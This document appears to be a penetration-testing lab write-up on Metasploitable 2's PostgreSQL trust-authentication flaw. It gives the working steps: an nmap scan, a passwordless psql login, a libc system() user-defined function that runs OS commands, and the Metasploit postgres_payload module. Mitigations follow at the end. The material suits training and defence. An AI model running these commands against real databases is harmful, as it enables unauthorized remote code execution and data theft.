01
Vulnerability Overview
PostgreSQL on Metasploitable 2 is configured with trust authentication, allowing passwordless login from any local or remote connection. Once authenticated, attackers can create user-defined functions to execute system commands, leading to remote code execution.
Trust authentication bypasses password checks entirely. Combined with PostgreSQL's ability to run OS commands, this leads to full system compromise.
02
Service Detection
bash
nmap -sV -v -p 5432 <target-ip>
03
Authentication Bypass
Connect to PostgreSQL without password using psql:
bash
psql -h <target-ip> -U postgres
Due to trust auth, no password is required.
04
Remote Code Execution
Create a user-defined function to execute system commands:
sql
CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT;
SELECT system('id');
05
Automated Exploitation — Metasploit
bash
msfconsole use exploit/multi/postgres/postgres_payload set RHOSTS <target-ip> set USERNAME postgres run
06
Results & Impact
Outcome
- Successfully bypassed authentication due to trust config
- Executed system commands via UDF
- Obtained remote shell access
- Full database access with potential for data exfiltration
Detection & Mitigation (Blue Team)
- Change authentication method from 'trust' to 'md5' or stronger
- Restrict PostgreSQL access to localhost only
- Use firewall rules to block port 5432 externally
- Monitor for suspicious UDF creation
- Apply least privilege principles to database users